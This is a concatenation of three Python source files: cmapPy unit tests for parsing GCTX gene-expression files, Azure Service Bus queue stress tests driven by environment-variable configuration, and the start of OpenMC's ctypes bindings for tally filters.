mg12 = parse_gctx.parse("cmapPy/pandasGEXpress/tests/functional_tests/mini_gctoo_for_testing.gctx", col_meta_only=True)
pandas_testing.assert_frame_equal(mg12, mg1.col_metadata_df)
# test with sort_row_meta False and ridx
mg13 = parse_gctx.parse("cmapPy/pandasGEXpress/tests/functional_tests/mini_gctoo_for_testing.gctx",)
# test with sort_col_meta False and cidx
mg13 = parse_gctx.parse("cmapPy/pandasGEXpress/tests/functional_tests//mini_gctoo_for_testing.gctx",
cidx = [4,1,3], sort_col_meta= False)
pandas_testing.assert_frame_equal(mg13.data_df, mg1.data_df.iloc[:, [4,1,3]])
pandas_testing.assert_frame_equal(mg13.col_metadata_df, mg1.col_metadata_df.iloc[[4,1,3],:])
pandas_testing.assert_frame_equal(mg13.row_metadata_df, mg1.row_metadata_df)
# test with sort_row_meta False and ridx
mg14 = parse_gctx.parse("cmapPy/pandasGEXpress/tests/functional_tests//mini_gctoo_for_testing.gctx",
ridx = [3,0,1], sort_row_meta= False)
pandas_testing.assert_frame_equal(mg14.data_df, mg1.data_df.iloc[[3,0,1],:])
pandas_testing.assert_frame_equal(mg14.col_metadata_df, mg1.col_metadata_df)
pandas_testing.assert_frame_equal(mg14.row_metadata_df, mg1.row_metadata_df.iloc[[3,0,1],:])
# test with sort_col_meta False and cidx and col_meta_only
mg15 = parse_gctx.parse("cmapPy/pandasGEXpress/tests/functional_tests//mini_gctoo_for_testing.gctx",
cidx = [4,1,3], sort_col_meta= False, col_meta_only=True)
pandas_testing.assert_frame_equal(mg15, mg1.col_metadata_df.iloc[[4,1,3],:])
# test with sort_row_meta False and ridx and row_meta_only
mg16 = parse_gctx.parse("cmapPy/pandasGEXpress/tests/functional_tests//mini_gctoo_for_testing.gctx",
ridx = [3,0,1], sort_row_meta= False, row_meta_only=True)
pandas_testing.assert_frame_equal(mg16, mg1.row_metadata_df.iloc[[3,0,1],:])
# test with sort_col_meta False and cid
cid_unsorted = ['LJP007_MCF7_24H:TRT_POSCON:BRD-K81418486:10','LJP007_MCF10A_24H:TRT_CP:BRD-K93918653:3.33']
mg17 = parse_gctx.parse("cmapPy/pandasGEXpress/tests/functional_tests//mini_gctoo_for_testing.gctx",
cid = cid_unsorted, sort_col_meta= False)
pandas_testing.assert_frame_equal(mg17.data_df, mg1.data_df.iloc[:, [2,0]])
pandas_testing.assert_frame_equal(mg17.col_metadata_df, mg1.col_metadata_df.iloc[[2,0],:])
pandas_testing.assert_frame_equal(mg17.row_metadata_df, mg1.row_metadata_df)
# test with sort_row_meta False and rid
rid_unsorted = ['LJP007_MCF7_24H:TRT_CP:BRD-K64857848:10', 'MISC003_A375_24H:TRT_CP:BRD-K93918653:3.33']
mg18 = parse_gctx.parse("cmapPy/pandasGEXpress/tests/functional_tests/mini_gctoo_for_testing.gctx",
rid = rid_unsorted, sort_row_meta=False)
pandas_testing.assert_frame_equal(mg18.data_df, mg1.data_df.iloc[[5,1], :])
pandas_testing.assert_frame_equal(mg18.col_metadata_df, mg1.col_metadata_df)
pandas_testing.assert_frame_equal(mg18.row_metadata_df, mg1.row_metadata_df.iloc[[5,1],:])
def test_parse_rid_as_entrez_id(self):
input_file = "cmapPy/pandasGEXpress/tests/functional_tests/test_parse_gctx_rid_entrez_id.gctx"
g = parse_gctx.parse(input_file)
self.assertEqual((5, 5), g.data_df.shape)
logger.debug("g.data_df.index: {}".format(g.data_df.index))
my_rids = ["5720", "55847", "7416"]
g = parse_gctx.parse(input_file, rid=my_rids)
self.assertEqual((3, 5), g.data_df.shape)
logger.debug("g.data_df.index: {}".format(g.data_df.index))
my_rids = [str(x) for x in my_rids]
logger.debug("using rid as str (mismatched type) - my_rids: {}".format(my_rids))
g = parse_gctx.parse(input_file, rid=my_rids)
self.assertEqual((3, 5), g.data_df.shape)
logger.debug("g.data_df.index: {}".format(g.data_df.index))
def test_check_and_order_id_inputs(self):
ridx = [0, 1]
cidx = [2, 1]
rid = ["a", "b", "c"]
cid = ["l", "m", "n", "o"]
row_meta = pd.DataFrame(index=["b", "c", "a", "d"])
col_meta = pd.DataFrame(index=["l", "m", "n", "o", "p", "q"])
# case 1: row and col lists are populated and same type
self.assertEqual((sorted(ridx), sorted(cidx)),
parse_gctx.check_and_order_id_inputs(None, ridx, None, cidx, row_meta, col_meta, sort_row_meta = True, sort_col_meta = True))
# case 2: row & col lists are populated, but of different types
self.assertEqual((sorted(ridx), [0, 1, 2, 3]),
parse_gctx.check_and_order_id_inputs(None, ridx, cid, None, row_meta, col_meta, sort_row_meta = True, sort_col_meta = True))
# case 3: row list and col lists are both None
self.assertEqual(([0, 1, 2, 3], [0, 1, 2, 3, 4, 5]),
parse_gctx.check_and_order_id_inputs(None, None, None, None, row_meta, col_meta, sort_row_meta = True, sort_col_meta = True))
# case 4: row list is populated, col list is None
self.assertEqual(([0, 1, 2], [0, 1, 2, 3, 4, 5]),
parse_gctx.check_and_order_id_inputs(rid, None, None, None, row_meta, col_meta, sort_row_meta = True, sort_col_meta = True))
def test_check_id_idx_exclusivity(self):
ids = ["a", "b", "c"]
idx = [0, 1, 2]
# case 1: id != None and idx != None
with self.assertRaises(Exception) as context:
parse_gctx.check_id_idx_exclusivity(ids, idx)
self.assertTrue("'id' and 'idx' fields can't both not be None" in str(context.exception))
# case 2: id != None
self.assertEqual(("id", ids), parse_gctx.check_id_idx_exclusivity(ids, None))
# case 3: idx != None
self.assertEqual(("idx", idx), parse_gctx.check_id_idx_exclusivity(None, idx))
# case 4: id == None & idx == None
self.assertEqual((None, []), parse_gctx.check_id_idx_exclusivity(None, None))
def test_parse_metadata_df(self):
mini_gctoo = mini_gctoo_for_testing.make()
# convert row_metadata to np.nan
mini_row_meta = mini_gctoo.row_metadata_df.replace([-666, "-666", -666.0], [np.nan, np.nan, np.nan])
logger.debug("mini_row_meta.shape: {}".format(mini_row_meta.shape))
logger.debug("mini_row_meta.index: {}".format(mini_row_meta.index))
logger.debug("mini_row_meta.columns: {}".format(mini_row_meta.columns))
logger.debug("mini_row_meta.dtypes: {}".format(mini_row_meta.dtypes))
gctx_file = h5py.File("cmapPy/pandasGEXpress/tests/functional_tests/mini_gctoo_for_testing.gctx", "r")
row_dset = gctx_file[row_meta_group_node]
col_dset = gctx_file[col_meta_group_node]
# with convert_neg_666
row_df = parse_gctx.parse_metadata_df("row", row_dset, True)
logger.debug("row_df.dtypes: {}".format(row_df.dtypes))
pandas_testing.assert_frame_equal(mini_row_meta, row_df)
# no convert_neg_666
mini_gctoo_with_neg_666 = mini_gctoo_for_testing.make(convert_neg_666=False)
col_df = parse_gctx.parse_metadata_df("col", col_dset, False)
pandas_testing.assert_frame_equal(mini_gctoo_with_neg_666.col_metadata_df, col_df)
# test that ID's are not converted to numeric
expected_rids = [str(i) for i in range(3)]
row_dset = {"id": MockHdf5Dset(expected_rids, str),
"other_meta": MockHdf5Dset(range(3, 6), str)}
r = parse_gctx.parse_metadata_df("row", row_dset, True)
logger.debug("test that ID's are not converted to numeric - r: {}".format(r))
logger.debug("r.index: {}".format(r.index))
self.assertEqual(set(expected_rids), set(r.index))
def test_replace_666(self):
# convert_neg_666 is True
row_df = pd.DataFrame([[3, "a"], [-666, "c"], ["-666", -666.0]],
index=["r1", "r2", "r3"], columns=["rhd1", "rhd2"])
e_df = pd.DataFrame([[3, "a"], [np.nan, "c"], [np.nan, np.nan]],
index=["r1", "r2", "r3"], columns=["rhd1", "rhd2"])
out_df = parse_gctx.replace_666(row_df, convert_neg_666=True)
self.assertTrue(e_df.equals(out_df))
# convert_neg_666 is False
e_df2 = pd.DataFrame([[3, "a"], ["-666", "c"], ["-666", "-666"]],
index=["r1", "r2", "r3"], columns=["rhd1", "rhd2"])
out_df2 = parse_gctx.replace_666(row_df, convert_neg_666=False)
self.assertTrue(e_df2.equals(out_df2))
# edge case: if row meta is 1 column of floats
row_df3 = pd.DataFrame([[3], [-666], [-666.0]],
index=["r1", "r2", "r3"], columns=["rhd3"])
e_df3 = pd.DataFrame([[3], [np.nan], [np.nan]],
index=["r1", "r2", "r3"], columns=["rhd3"])
out_df3 = parse_gctx.replace_666(row_df3, convert_neg_666=True)
self.assertTrue(e_df3.equals(out_df3))
def test_set_metadata_index_and_column_names(self):
mini_gctoo = mini_gctoo_for_testing.make()
mini_gctoo.row_metadata_df.index.name = None
mini_gctoo.row_metadata_df.columns.name = None
mini_gctoo.col_metadata_df.index.name = None
mini_gctoo.col_metadata_df.columns.name = None
# case 1: dim == "row"
parse_gctx.set_metadata_index_and_column_names("row", mini_gctoo.row_metadata_df)
self.assertEqual(mini_gctoo.row_metadata_df.index.name, "rid")
self.assertEqual(mini_gctoo.row_metadata_df.columns.name, "rhd")
# case 2: dim == "col"
parse_gctx.set_metadata_index_and_column_names("col", mini_gctoo.col_metadata_df)
self.assertEqual(mini_gctoo.col_metadata_df.index.name, "cid")
self.assertEqual(mini_gctoo.col_metadata_df.columns.name, "chd")
def test_get_ordered_idx(self):
mg = mini_gctoo_for_testing.make()
# case 1: id_type == None
case1 = parse_gctx.get_ordered_idx(None, [], mg.row_metadata_df, sort_idx = True)
self.assertEqual(case1, list(range(0, 6)),
"Expected ordered idx to be {} but got {}".format(list(range(0, 6)), case1))
# case 2: id_type == "id"
case2 = parse_gctx.get_ordered_idx("id",
['LJP007_MCF7_24H:CTL_VEHICLE:DMSO:-666'], mg.col_metadata_df, sort_idx = True)
self.assertEqual(case2, [4],
"Expected ordered idx to be {} but got {}".format([4], case2))
# case 3: id_type == ridx
case3 = parse_gctx.get_ordered_idx("idx",
[5, 1, 3], mg.col_metadata_df, sort_idx = True)
self.assertEqual(case3, [1, 3, 5],
"Expected ordered idx to be {} but got {}".format([1, 3, 5], case3))
def test_parse_data_df(self):
mini_data_df = pd.DataFrame([[-0.283359, 0.011270], [0.304119, 1.921061], [0.398655, -0.144652]],
index=["200814_at", "218597_s_at", "217140_s_at"],
columns=["LJP005_A375_24H:DMSO:-666", "LJP005_A375_24H:BRD-K76908866:10"])
mini_data_df = mini_data_df.astype(np.float32)
mini_data_df.index.name = "rid"
mini_data_df.columns.name = "cid"
# create h5py File instance
mini_gctx = h5py.File("cmapPy/pandasGEXpress/tests/functional_tests/mini_gctx_with_metadata_n2x3.gctx", "r")
data_dset = mini_gctx[data_node]
# get relevant metadata fields
col_meta = parse_gctx.get_column_metadata("cmapPy/pandasGEXpress/tests/functional_tests/mini_gctx_with_metadata_n2x3.gctx")
row_meta = parse_gctx.get_row_metadata("cmapPy/pandasGEXpress/tests/functional_tests/mini_gctx_with_metadata_n2x3.gctx")
# case 1: no subsetting
data_df1 = parse_gctx.parse_data_df(data_dset, [0, 1, 2], [0, 1], row_meta, col_meta)
# note: checks to 3 decimal places
pandas_testing.assert_frame_equal(mini_data_df, data_df1,
check_exact=False, check_less_precise=True)
# case 2: subset; ridx < cidx
data_df2 = parse_gctx.parse_data_df(data_dset, [0], [0, 1], row_meta, col_meta)
pandas_testing.assert_frame_equal(mini_data_df.iloc[[0], [0, 1]], data_df2,
check_exact=False, check_less_precise=True)
# case 3: subset; ridx == cidx
data_df3 = parse_gctx.parse_data_df(data_dset, [0], [0], row_meta, col_meta)
pandas_testing.assert_frame_equal(mini_data_df.iloc[[0], [0]], data_df3,
check_exact=False, check_less_precise=True)
# case 4: subset; ridx > cidx
data_df4 = parse_gctx.parse_data_df(data_dset, [0, 1, 2], [0], row_meta, col_meta)
pandas_testing.assert_frame_equal(mini_data_df.iloc[[0, 1, 2], [0]], data_df4,
check_exact=False, check_less_precise=True)
mini_gctx.close()
def test_convert_ids_to_meta_type(self):
# happy path
id_list = [0, 1, 2]
self.assertEqual(int, type(id_list[0]))
df = pd.DataFrame({}, index=pd.Series(range(1, 4)).astype(np.int64))
r = parse_gctx.convert_ids_to_meta_type(id_list, df)
logger.debug("conversion from regular int to numpy int64 - type(r[0]): {}".format(type(r[0])))
self.assertEqual(np.int64, type(r[0]))
id_list = [str(i) for i in range(3)]
r = parse_gctx.convert_ids_to_meta_type(id_list, df)
logger.debug("conversion from str to numpy int64 - type(r[0]): {}".format(type(r[0])))
self.assertEqual(np.int64, type(r[0]))
# unhappy path
id_list[0] = "a"
with self.assertRaises(Exception) as context:
parse_gctx.convert_ids_to_meta_type(id_list, df)
logger.debug("context.exception: {}".format(context.exception))
self.assertIn(
"The type of the id_list (rid or cid) being used to subset the data is not compatible with the metadata id's in the file",
str(context.exception))
def test_check_idx_validity(self):
id_list = [0,1,2]
df = pd.DataFrame({}, index=range(5))
logger.debug("df.shape: {}".format(df.shape))
parse_gctx.check_idx_validity(id_list, df, sort_id = True)
id_list[0] = -1
with self.assertRaises(Exception) as context:
parse_gctx.check_idx_validity(id_list, df, sort_id = True)
logger.debug("context.exception: {}".format(context.exception))
self.assertIn("some of indexes being used to subset the data are not valid", str(context.exception))
self.assertIn("[-1]", str(context.exception))
invalid_high = df.shape[0] + 1
id_list[0] = invalid_high
with self.assertRaises(Exception) as context:
parse_gctx.check_idx_validity(id_list, df, sort_id = True)
logger.debug("context.exception: {}".format(context.exception))
self.assertIn("some of indexes being used to subset the data are not valid", str(context.exception))
self.assertIn("[{}]".format(invalid_high), str(context.exception))
def test_check_id_validity(self):
id_list = ["a", "b", "c"]
df = pd.DataFrame({}, index=["a", "b", "c", "d"])
parse_gctx.check_id_validity(id_list, df)
id_list[0] = "z"
with self.assertRaises(Exception) as context:
parse_gctx.check_id_validity(id_list, df)
logger.debug("context.exception: {}".format(context.exception))
self.assertIn(
"some of the ids being used to subset the data are not present in the metadata for the file being parsed",
str(context.exception))
if __name__ == "__main__":
setup_logger.setup(verbose=True)
unittest.main()
|
|
#-------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#--------------------------------------------------------------------------
from datetime import timedelta
import time
import os
import pytest
from dotenv import load_dotenv
#from argparse import ArgumentParser
from azure.servicebus import AutoLockRenewer, ServiceBusClient
from azure.servicebus._common.constants import ServiceBusReceiveMode
from app_insights_metric import AzureMonitorMetric
from stress_test_base import StressTestRunner, ReceiveType
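# Stress test configuration is read from the environment (optionally loaded from a .env file via ENV_FILE).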
ENV_FILE = os.environ.get('ENV_FILE')
load_dotenv(dotenv_path=ENV_FILE, override=True)
LOGGING_ENABLE = False
SERVICE_BUS_CONNECTION_STR = os.environ.get('SERVICE_BUS_CONNECTION_STR')
SERVICEBUS_QUEUE_NAME = os.environ.get('SERVICE_BUS_QUEUE_NAME')
@pytest.mark.liveTest
@pytest.mark.live_test_only
def test_stress_queue_send_and_receive():
sb_client = ServiceBusClient.from_connection_string(
SERVICE_BUS_CONNECTION_STR, logging_enable=LOGGING_ENABLE)
stress_test = StressTestRunner(senders = [sb_client.get_queue_sender(SERVICEBUS_QUEUE_NAME)],
receivers = [sb_client.get_queue_receiver(SERVICEBUS_QUEUE_NAME)],
duration=timedelta(seconds=60),
azure_monitor_metric=AzureMonitorMetric("test_stress_queue_send_and_receive")
)
result = stress_test.run()
assert(result.total_sent > 0)
assert(result.total_received > 0)
@pytest.mark.liveTest
@pytest.mark.live_test_only
def test_stress_queue_send_and_pull_receive():
sb_client = ServiceBusClient.from_connection_string(
SERVICE_BUS_CONNECTION_STR, logging_enable=LOGGING_ENABLE)
stress_test = StressTestRunner(senders = [sb_client.get_queue_sender(SERVICEBUS_QUEUE_NAME)],
receivers = [sb_client.get_queue_receiver(SERVICEBUS_QUEUE_NAME)],
receive_type=ReceiveType.pull,
duration=timedelta(seconds=60),
azure_monitor_metric=AzureMonitorMetric("test_stress_queue_send_and_pull_receive")
)
result = stress_test.run()
assert(result.total_sent > 0)
assert(result.total_received > 0)
@pytest.mark.liveTest
@pytest.mark.live_test_only
def test_stress_queue_batch_send_and_receive():
sb_client = ServiceBusClient.from_connection_string(
SERVICE_BUS_CONNECTION_STR, logging_enable=LOGGING_ENABLE)
stress_test = StressTestRunner(senders = [sb_client.get_queue_sender(SERVICEBUS_QUEUE_NAME)],
receivers = [sb_client.get_queue_receiver(SERVICEBUS_QUEUE_NAME)],
duration=timedelta(seconds=60),
send_batch_size=5,
azure_monitor_metric=AzureMonitorMetric("test_stress_queue_batch_send_and_receive")
)
result = stress_test.run()
assert(result.total_sent > 0)
assert(result.total_received > 0)
@pytest.mark.liveTest
@pytest.mark.live_test_only
def test_stress_queue_slow_send_and_receive():
sb_client = ServiceBusClient.from_connection_string(
SERVICE_BUS_CONNECTION_STR, logging_enable=LOGGING_ENABLE)
stress_test = StressTestRunner(senders = [sb_client.get_queue_sender(SERVICEBUS_QUEUE_NAME)],
receivers = [sb_client.get_queue_receiver(SERVICEBUS_QUEUE_NAME)],
duration=timedelta(seconds=3501*3),
send_delay=3500,
azure_monitor_metric=AzureMonitorMetric("test_stress_queue_slow_send_and_receive")
)
result = stress_test.run()
assert(result.total_sent > 0)
assert(result.total_received > 0)
@pytest.mark.liveTest
@pytest.mark.live_test_only
def test_stress_queue_receive_and_delete():
sb_client = ServiceBusClient.from_connection_string(
SERVICE_BUS_CONNECTION_STR, logging_enable=LOGGING_ENABLE)
stress_test = StressTestRunner(senders = [sb_client.get_queue_sender(SERVICEBUS_QUEUE_NAME)],
receivers = [sb_client.get_queue_receiver(SERVICEBUS_QUEUE_NAME, receive_mode=ServiceBusReceiveMode.RECEIVE_AND_DELETE)],
should_complete_messages = False,
duration=timedelta(seconds=60),
azure_monitor_metric=AzureMonitorMetric("test_stress_queue_slow_send_and_receive")
)
result = stress_test.run()
assert(result.total_sent > 0)
assert(result.total_received > 0)
@pytest.mark.liveTest
@pytest.mark.live_test_only
def test_stress_queue_unsettled_messages():
sb_client = ServiceBusClient.from_connection_string(
SERVICE_BUS_CONNECTION_STR, logging_enable=LOGGING_ENABLE)
stress_test = StressTestRunner(senders = [sb_client.get_queue_sender(SERVICEBUS_QUEUE_NAME)],
receivers = [sb_client.get_queue_receiver(SERVICEBUS_QUEUE_NAME)],
duration = timedelta(seconds=350),
should_complete_messages = False,
azure_monitor_metric=AzureMonitorMetric("test_stress_queue_unsettled_messages")
)
result = stress_test.run()
# This test is prompted by reports of an issue where enough unsettled messages saturate a service-side cache
# and prevent further receipt.
assert(result.total_sent > 2500)
assert(result.total_received > 2500)
@pytest.mark.liveTest
@pytest.mark.live_test_only
def test_stress_queue_receive_large_batch_size():
sb_client = ServiceBusClient.from_connection_string(
SERVICE_BUS_CONNECTION_STR, logging_enable=LOGGING_ENABLE)
stress_test = StressTestRunner(senders = [sb_client.get_queue_sender(SERVICEBUS_QUEUE_NAME)],
receivers = [sb_client.get_queue_receiver(SERVICEBUS_QUEUE_NAME, prefetch_count=50)],
duration = timedelta(seconds=60),
max_message_count = 50,
azure_monitor_metric=AzureMonitorMetric("test_stress_queue_receive_large_batch_size")
)
result = stress_test.run()
assert(result.total_sent > 0)
assert(result.total_received > 0)
# Cannot be defined at local scope due to pickling into multiproc runner.
class ReceiverTimeoutStressTestRunner(StressTestRunner):
def on_send(self, state, sent_message, sender):
'''Called on every successful send'''
if state.total_sent % 10 == 0:
# To make receive time out, in push mode this delay would trigger receiver reconnection
time.sleep(self.max_wait_time + 5)
@pytest.mark.liveTest
@pytest.mark.live_test_only
def test_stress_queue_pull_receive_timeout():
sb_client = ServiceBusClient.from_connection_string(
SERVICE_BUS_CONNECTION_STR, logging_enable=LOGGING_ENABLE)
stress_test = ReceiverTimeoutStressTestRunner(
senders = [sb_client.get_queue_sender(SERVICEBUS_QUEUE_NAME)],
receivers = [sb_client.get_queue_receiver(SERVICEBUS_QUEUE_NAME)],
max_wait_time = 5,
receive_type=ReceiveType.pull,
duration=timedelta(seconds=600),
azure_monitor_metric=AzureMonitorMetric("test_stress_queue_pull_receive_timeout")
)
result = stress_test.run()
assert(result.total_sent > 0)
assert(result.total_received > 0)
class LongRenewStressTestRunner(StressTestRunner):
def on_receive(self, state, received_message, receiver):
'''Called on every successful receive'''
renewer = AutoLockRenewer()
renewer.register(receiver, received_message, max_lock_renewal_duration=300)
time.sleep(300)
@pytest.mark.liveTest
@pytest.mark.live_test_only
def test_stress_queue_long_renew_send_and_receive():
sb_client = ServiceBusClient.from_connection_string(
SERVICE_BUS_CONNECTION_STR, logging_enable=LOGGING_ENABLE)
stress_test = LongRenewStressTestRunner(
senders = [sb_client.get_queue_sender(SERVICEBUS_QUEUE_NAME)],
receivers = [sb_client.get_queue_receiver(SERVICEBUS_QUEUE_NAME)],
duration=timedelta(seconds=3000),
send_delay=300,
azure_monitor_metric=AzureMonitorMetric("test_stress_queue_long_renew_send_and_receive")
)
result = stress_test.run()
assert(result.total_sent > 0)
assert(result.total_received > 0)
class LongSessionRenewStressTestRunner(StressTestRunner):
def on_receive(self, state, received_message, receiver):
'''Called on every successful receive'''
renewer = AutoLockRenewer()
def on_fail(renewable, error):
print("FAILED AUTOLOCKRENEW: " + str(error))
renewer.register(receiver, receiver.session, max_lock_renewal_duration=600, on_lock_renew_failure=on_fail)
@pytest.mark.liveTest
@pytest.mark.live_test_only
def test_stress_queue_long_renew_session_send_and_receive():
sb_client = ServiceBusClient.from_connection_string(
SERVICE_BUS_CONNECTION_STR, logging_enable=LOGGING_ENABLE)
session_id = 'test_stress_queue_long_renew_send_and_receive'
stress_test = LongSessionRenewStressTestRunner(
senders = [sb_client.get_queue_sender(SERVICEBUS_QUEUE_NAME)],
receivers = [sb_client.get_queue_receiver(SERVICEBUS_QUEUE_NAME, session_id=session_id)],
duration=timedelta(seconds=3000),
send_delay=300,
send_session_id=session_id,
azure_monitor_metric=AzureMonitorMetric("test_stress_queue_long_renew_session_send_and_receive")
)
result = stress_test.run()
assert(result.total_sent > 0)
assert(result.total_received > 0)
class Peekon_receiveStressTestRunner(StressTestRunner):
def on_receive_batch(self, state, received_message, receiver):
'''Called on every successful receive'''
assert receiver.peek_messages()[0]
@pytest.mark.liveTest
@pytest.mark.live_test_only
def test_stress_queue_peek_messages():
sb_client = ServiceBusClient.from_connection_string(
SERVICE_BUS_CONNECTION_STR, logging_enable=LOGGING_ENABLE)
stress_test = Peekon_receiveStressTestRunner(
senders = [sb_client.get_queue_sender(SERVICEBUS_QUEUE_NAME)],
receivers = [sb_client.get_queue_receiver(SERVICEBUS_QUEUE_NAME)],
duration = timedelta(seconds=300),
receive_delay = 30,
receive_type = ReceiveType.none,
azure_monitor_metric=AzureMonitorMetric("test_stress_queue_peek_messages")
)
result = stress_test.run()
assert(result.total_sent > 0)
# TODO: This merits better validation, to be implemented alongside full metric spread.
class RestartHandlerStressTestRunner(StressTestRunner):
def post_receive(self, state, receiver):
'''Called after completion of every successful receive'''
if state.total_received % 3 == 0:
receiver.__exit__()
receiver.__enter__()
def on_send(self, state, sent_message, sender):
        '''Called after completion of every successful send'''
if state.total_sent % 3 == 0:
sender.__exit__()
sender.__enter__()
@pytest.mark.liveTest
@pytest.mark.live_test_only
@pytest.mark.skip(reason='This test is disabled unless re-openability of handlers is desired and re-enabled')
def test_stress_queue_close_and_reopen():
sb_client = ServiceBusClient.from_connection_string(
SERVICE_BUS_CONNECTION_STR, logging_enable=LOGGING_ENABLE)
stress_test = RestartHandlerStressTestRunner(
senders = [sb_client.get_queue_sender(SERVICEBUS_QUEUE_NAME)],
receivers = [sb_client.get_queue_receiver(SERVICEBUS_QUEUE_NAME)],
duration = timedelta(seconds=300),
receive_delay = 30,
send_delay = 10,
azure_monitor_metric=AzureMonitorMetric("test_stress_queue_close_and_reopen")
)
result = stress_test.run()
assert(result.total_sent > 0)
assert(result.total_received > 0)
# This test validates that all individual messages are received contiguously over a long time period
# (i.e. that none are dropped, lost on send, or lost on receive). A standalone sketch of the
# contiguity bookkeeping used in on_receive follows the class definition below.
class DroppedMessageCheckerStressTestRunner(StressTestRunner):
def on_receive(self, state, received_message, receiver):
'''Called on every successful receive'''
last_seen = getattr(state, 'last_seen', -1)
noncontiguous = getattr(state, 'noncontiguous', set())
body = int(str(received_message))
if body == last_seen+1:
last_seen += 1
if noncontiguous:
while (last_seen+1) in noncontiguous:
last_seen += 1
noncontiguous.remove(last_seen)
else:
noncontiguous.add(body)
state.noncontiguous = noncontiguous
state.last_seen = last_seen
    def pre_process_message_body(self, payload):
        '''Called when constructing message body'''
        try:
            body = self._message_id
        except AttributeError:
            self._message_id = 0
            body = 0
        # Keep the counter on the instance so bodies form the contiguous 0,1,2,... sequence
        # that on_receive checks for.
        self._message_id += 1
        return str(body)
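# Illustrative sketch only (not invoked by the stress framework): the same contiguity
# bookkeeping as DroppedMessageCheckerStressTestRunner.on_receive above, applied to a
# plain list of integer message bodies. The helper name _demo_track_contiguity is
# hypothetical and exists purely for illustration.
def _demo_track_contiguity(bodies):
    last_seen, noncontiguous = -1, set()
    for body in bodies:
        if body == last_seen + 1:
            last_seen += 1
            # Fold in any later bodies that arrived early and are now contiguous.
            while (last_seen + 1) in noncontiguous:
                last_seen += 1
                noncontiguous.remove(last_seen)
        else:
            noncontiguous.add(body)
    # Anything left in noncontiguous arrived without all of its predecessors.
    return last_seen, noncontiguous
# e.g. _demo_track_contiguity([0, 1, 3, 2, 4]) == (4, set())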
@pytest.mark.liveTest
@pytest.mark.live_test_only
def test_stress_queue_check_for_dropped_messages():
sb_client = ServiceBusClient.from_connection_string(
SERVICE_BUS_CONNECTION_STR, logging_enable=LOGGING_ENABLE)
stress_test = DroppedMessageCheckerStressTestRunner(
senders = [sb_client.get_queue_sender(SERVICEBUS_QUEUE_NAME)],
receivers = [sb_client.get_queue_receiver(SERVICEBUS_QUEUE_NAME)],
receive_type=ReceiveType.pull,
duration=timedelta(seconds=3000),
azure_monitor_metric=AzureMonitorMetric("test_stress_queue_check_for_dropped_messages")
)
result = stress_test.run()
assert(result.total_sent > 0)
assert(result.total_received > 0)
if __name__ == '__main__':
#parser = ArgumentParser()
pytest.main()
|
|
from collections.abc import Mapping
from ctypes import c_int, c_int32, c_double, c_char_p, POINTER, \
create_string_buffer, c_size_t
from weakref import WeakValueDictionary
import numpy as np
from numpy.ctypeslib import as_array
from openmc.exceptions import AllocationError, InvalidIDError
from . import _dll
from .core import _FortranObjectWithID
from .error import _error_handler
from .material import Material
from .mesh import RegularMesh
__all__ = [
'Filter', 'AzimuthalFilter', 'CellFilter', 'CellbornFilter', 'CellfromFilter',
'CellInstanceFilter', 'DistribcellFilter', 'DelayedGroupFilter', 'EnergyFilter',
'EnergyoutFilter', 'EnergyFunctionFilter', 'LegendreFilter', 'MaterialFilter',
'MeshFilter', 'MeshSurfaceFilter', 'MuFilter', 'ParticleFilter', 'PolarFilter',
'SphericalHarmonicsFilter', 'SpatialLegendreFilter', 'SurfaceFilter',
'UniverseFilter', 'ZernikeFilter', 'ZernikeRadialFilter', 'filters'
]
# Filter-related C API bindings (argument types, return types, error handling)
_dll.openmc_cell_filter_get_bins.argtypes = [
c_int32, POINTER(POINTER(c_int32)), POINTER(c_int32)]
_dll.openmc_cell_filter_get_bins.restype = c_int
_dll.openmc_cell_filter_get_bins.errcheck = _error_handler
_dll.openmc_energy_filter_get_bins.argtypes = [
c_int32, POINTER(POINTER(c_double)), POINTER(c_size_t)]
_dll.openmc_energy_filter_get_bins.restype = c_int
_dll.openmc_energy_filter_get_bins.errcheck = _error_handler
_dll.openmc_energy_filter_set_bins.argtypes = [c_int32, c_size_t, POINTER(c_double)]
_dll.openmc_energy_filter_set_bins.restype = c_int
_dll.openmc_energy_filter_set_bins.errcheck = _error_handler
_dll.openmc_energyfunc_filter_set_data.restype = c_int
_dll.openmc_energyfunc_filter_set_data.errcheck = _error_handler
_dll.openmc_energyfunc_filter_set_data.argtypes = [
c_int32, c_size_t, POINTER(c_double), POINTER(c_double)]
_dll.openmc_energyfunc_filter_get_energy.restype = c_int
_dll.openmc_energyfunc_filter_get_energy.errcheck = _error_handler
_dll.openmc_energyfunc_filter_get_energy.argtypes = [
c_int32, POINTER(c_size_t), POINTER(POINTER(c_double))]
_dll.openmc_energyfunc_filter_get_y.restype = c_int
_dll.openmc_energyfunc_filter_get_y.errcheck = _error_handler
_dll.openmc_energyfunc_filter_get_y.argtypes = [
c_int32, POINTER(c_size_t), POINTER(POINTER(c_double))]
_dll.openmc_filter_get_id.argtypes = [c_int32, POINTER(c_int32)]
_dll.openmc_filter_get_id.restype = c_int
_dll.openmc_filter_get_id.errcheck = _error_handler
_dll.openmc_filter_get_type.argtypes = [c_int32, c_char_p]
_dll.openmc_filter_get_type.restype = c_int
_dll.openmc_filter_get_type.errcheck = _error_handler
_dll.openmc_filter_set_id.argtypes = [c_int32, c_int32]
_dll.openmc_filter_set_id.restype = c_int
_dll.openmc_filter_set_id.errcheck = _error_handler
_dll.openmc_get_filter_index.argtypes = [c_int32, POINTER(c_int32)]
_dll.openmc_get_filter_index.restype = c_int
_dll.openmc_get_filter_index.errcheck = _error_handler
_dll.openmc_legendre_filter_get_order.argtypes = [c_int32, POINTER(c_int)]
_dll.openmc_legendre_filter_get_order.restype = c_int
_dll.openmc_legendre_filter_get_order.errcheck = _error_handler
_dll.openmc_legendre_filter_set_order.argtypes = [c_int32, c_int]
_dll.openmc_legendre_filter_set_order.restype = c_int
_dll.openmc_legendre_filter_set_order.errcheck = _error_handler
_dll.openmc_material_filter_get_bins.argtypes = [
c_int32, POINTER(POINTER(c_int32)), POINTER(c_size_t)]
_dll.openmc_material_filter_get_bins.restype = c_int
_dll.openmc_material_filter_get_bins.errcheck = _error_handler
_dll.openmc_material_filter_set_bins.argtypes = [c_int32, c_size_t, POINTER(c_int32)]
_dll.openmc_material_filter_set_bins.restype = c_int
_dll.openmc_material_filter_set_bins.errcheck = _error_handler
_dll.openmc_mesh_filter_get_mesh.argtypes = [c_int32, POINTER(c_int32)]
_dll.openmc_mesh_filter_get_mesh.restype = c_int
